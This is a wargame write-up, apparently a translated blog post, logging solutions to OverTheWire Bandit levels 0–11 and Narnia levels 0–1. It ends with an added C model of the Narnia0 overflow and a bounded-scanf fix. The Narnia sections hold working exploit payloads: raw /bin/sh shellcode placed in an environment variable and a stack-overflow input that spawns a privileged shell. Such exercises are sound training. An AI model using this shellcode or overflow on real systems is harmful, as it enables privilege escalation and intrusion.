bandit0

[SSH] Logged in (password)

bandit0@melinda:~$ ls

readme

bandit0@melinda:~$ cat readme

<password>


bandit1

[SSH] Logged in (password)

bandit1@melinda:~$ ls

-

bandit1@melinda:~$ cat ./-

<password>


bandit2

[SSH] Logged in (password)

bandit2@melinda:~$ ls

spaces in this filename

bandit2@melinda:~$ cat "spaces in this filename"

<password>


bandit3

[SSH] Logged in (password)

bandit3@melinda:~$ ls

inhere

bandit3@melinda:~$ cd inhere

bandit3@melinda:~/inhere$ ls

bandit3@melinda:~/inhere$ ls -al

total 12

drwxr-xr-x 2 root    root    4096 Jun  6  2013 .

drwxr-xr-x 3 root    root    4096 Jun  6  2013 ..

-rw-r----- 1 bandit4 bandit3   33 Jun  6  2013 .hidden

bandit3@melinda:~/inhere$ cat .hidden

<password>


bandit4

[SSH] Logged in (password)

bandit4@melinda:~$ ls

inhere

bandit4@melinda:~$ cd inhere

bandit4@melinda:~/inhere$ ls

-file00  -file01  -file02  -file03  -file04  -file05  -file06  -file07  -file08  -file09

bandit4@melinda:~/inhere$ cat ./-file04

<binary data>

bandit4@melinda:~/inhere$ cat ./-file05

<binary data>

bandit4@melinda:~/inhere$ cat ./-file06

<binary data>

bandit4@melinda:~/inhere$ cat ./-file08

<binary data>

bandit4@melinda:~/inhere$ cat ./-file09

<binary data>

bandit4@melinda:~/inhere$ cat ./-file07

<password>


bandit5

[SSH] Logged in (password)

bandit5@melinda:~$ ls

inhere

bandit5@melinda:~$ cd inhere

bandit5@melinda:~/inhere$ find -size 1033c

./maybehere07/.file2

bandit5@melinda:~/inhere$ cat ./maybehere07/.file2


bandit6

[SSH] Logged in (password)

bandit6@melinda:~$ ls

bandit6@melinda:~$ ls -al

total 20

drwxr-xr-x   2 root root 4096 Jun  6  2013 .

drwxr-xr-x 160 root root 4096 Oct 17  2013 ..

-rw-r--r--   1 root root  220 Apr  3  2012 .bash_logout

-rw-r--r--   1 root root 3486 Apr  3  2012 .bashrc

-rw-r--r--   1 root root  675 Apr  3  2012 .profile

bandit6@melinda:/home$ find -size 33c

./bandit21/.prevpass

./bandit15/.bandit14.password

find: `./bandit5/inhere': Permission denied

[...]

find: `/root': Permission denied


bandit6@melinda:/home$ find / -size 33c -user bandit7 -group bandit6 2>&1 | grep -v 'Permission denied'

/var/lib/dpkg/info/bandit7.password

bandit6@melinda:/home$ cat /var/lib/dpkg/info/bandit7.password

<password>

+)Searched for: (Google) how to use find size group user options, how to ignore permission denied in linux find


bandit7

[SSH] Logged in (password)

bandit7@melinda:~$ ls

data.txt

<Opened the file, almost died>

bandit7@melinda:~$ grep "millionth" data.txt

millionth <password>

+)Searched for: how to grep for a string in file


bandit8

[SSH] Logged in (password)

bandit8@melinda:~$ ls

data.txt

bandit8@melinda:~$ sort data.txt | uniq -u

<password>

+)Searched for: how to exclude duplicate string in file


bandit9

[SSH] Logged in (password)

bandit9@melinda:~$ ls

data.txt

bandit9@melinda:~$ cat data.txt

<look through file, found the password at first glance>

O.o...No this is not the way I wanna...*cough cough*


bandit10

[SSH] Logged in (password)

bandit10@melinda:~$ ls

data.txt

bandit10@melinda:~$ cat data.txt

VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg==

bandit10@melinda:~$ echo VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg== | base64 --decode

<password>

+)Searched for: how to decode base64 in bash


bandit11

[SSH] Logged in (password)

bandit11@melinda:~$ ls

data.txt

bandit11@melinda:~$ cat data.txt | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]'

<password>

+)Searched for: reverse rot13 using tr




Oh yeah

narnia1@melinda:~$ cd /narnia

narnia1@melinda:/narnia$ ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c

narnia1@melinda:/narnia$ cat narnia1.c


#include <stdio.h>


int main(){

        int (*ret)();


        if(getenv("EGG")==NULL){

                printf("Give me something to execute at the env-variable EGG\n");

                exit(1);

        }


        printf("Trying to execute EGG!\n");

        ret = getenv("EGG");

        ret();


        return 0;

}


narnia1@melinda:/narnia$ export EGG=`perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`


narnia1@melinda:/narnia$ ./narnia1

Trying to execute EGG!

$ whoami

narnia2

$ id

uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14002(narnia2),14001(narnia1)

$ cat /etc/narnia_pass/narnia2

$

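At first, seeing "egg", I thought, uh, um, eggshell? (I've only seen it, never actually used it), but after reading carefully, this program unconditionally executes whatever is stored in the EGG environment variable, because it changes the return address to where EGG is.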



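LOB is hard... (closes LoL)

It's hard.. so hard.... So I decided to try a different wargame that 팔공-hyung recommended.

Connecting was very hard (high difficulty)

Partly because of my internet connection, and I also couldn't find the password so I guessed it, and I had no idea where the key file was so I rummaged around someone else's server..

Couldn't find the key file. I dug around the internet and found out where it is.

Below is the log. I've added blank lines to make it easier to read.

I'm not providing the keys.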

narnia0@melinda:~$ ls -al

total 20

drwxr-xr-x   2 root root 4096 Jun  6  2013 .

drwxr-xr-x 160 root root 4096 Oct 17  2013 ..

-rw-r--r--   1 root root  220 Apr  3  2012 .bash_logout

-rw-r--r--   1 root root 3486 Apr  3  2012 .bashrc

-rw-r--r--   1 root root  675 Apr  3  2012 .profile


narnia0@melinda:~$ cd /narnia

narnia0@melinda:/narnia$ ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c


narnia0@melinda:/narnia$ cat narnia0.c


#include <stdio.h>

#include <stdlib.h>


int main(){

        long val=0x41414141;

        char buf[20];


        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");

        printf("Here is your chance: ");

        scanf("%24s",&buf);


        printf("buf: %s\n",buf);

        printf("val: 0x%08x\n",val);


        if(val==0xdeadbeef)

                system("/bin/sh");

        else {

                printf("WAY OFF!!!!\n");

                exit(1);

        }


        return 0;

}


narnia0@melinda:/narnia$ ./narnia0

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: a

buf: a

val: 0x41414141

WAY OFF!!!!


narnia0@melinda:/narnia$ (perl -e 'print "\x90"x20, "\xef\xbe\xad\xde"';cat)|./narnia0 

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: buf: ᆳ

val: 0xdeadbeef

ls

narnia0    narnia1    narnia2    narnia3    narnia4    narnia5    narnia6    narnia7    narnia8

narnia0.c  narnia1.c  narnia2.c  narnia3.c  narnia4.c  narnia5.c  narnia6.c  narnia7.c  narnia8.c

cat key

cat: key: No such file or directory

whoami

narnia1


cat /etc/narnia_pass/narnia1


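When I first ran the file, it asks for input partway through.

This is something I also used in LOB: connect with a pipe and feed the value the program reads to it through standard input. In this case the first 20 bytes can be filled with anything, and the following 4 bytes have to be 0xdeadbeef. +)Little-endian: the bytes have to go in reversed.


And then, bam!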
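
The overflow described above, as an added example (not code from the original post or from the wargame): it models the frame as a byte array, assuming val sits directly after buf as the log output implies, and compares the original %24s width with a %19s bound. The names frame, read_original and read_bounded and the SAMPLE input are made up for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   20        /* char buf[20] in narnia0.c */
#define VAL_OFF   BUF_LEN   /* assumption: val sits directly after buf */
#define FRAME_LEN 32        /* model frame: buf, val, then slack bytes */

/* Constructed input: 20 filler bytes, then 0xdeadbeef in little-endian order. */
static const char SAMPLE[] = "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde";

unsigned char frame[FRAME_LEN];   /* stands in for the stack frame */

static void frame_reset(void) {
    memset(frame, 0xCC, FRAME_LEN);       /* 0xCC marks untouched bytes */
    memset(frame + VAL_OFF, 0x41, 4);     /* long val = 0x41414141 */
}

/* Decode val the way the 32-bit x86 target does: least significant byte first. */
static uint32_t frame_val(void) {
    const unsigned char *p = frame + VAL_OFF;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* As in narnia0.c: width 24 allows 24 bytes plus a NUL into a 20-byte buf. */
uint32_t read_original(const char *input) {
    frame_reset();
    sscanf(input, "%24s", (char *)frame);
    return frame_val();
}

/* Hardened: the width must be sizeof(buf) - 1 to leave room for the NUL. */
uint32_t read_bounded(const char *input) {
    frame_reset();
    sscanf(input, "%19s", (char *)frame);
    return frame_val();
}

int main(void) {
    printf("%%24s -> val: 0x%08x\n", (unsigned)read_original(SAMPLE));
    printf("%%19s -> val: 0x%08x\n", (unsigned)read_bounded(SAMPLE));
    return 0;
}
```

The scanf width does not count the terminating NUL, so %24s can store 25 bytes; with %19s the write stops inside buf and val keeps 0x41414141.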
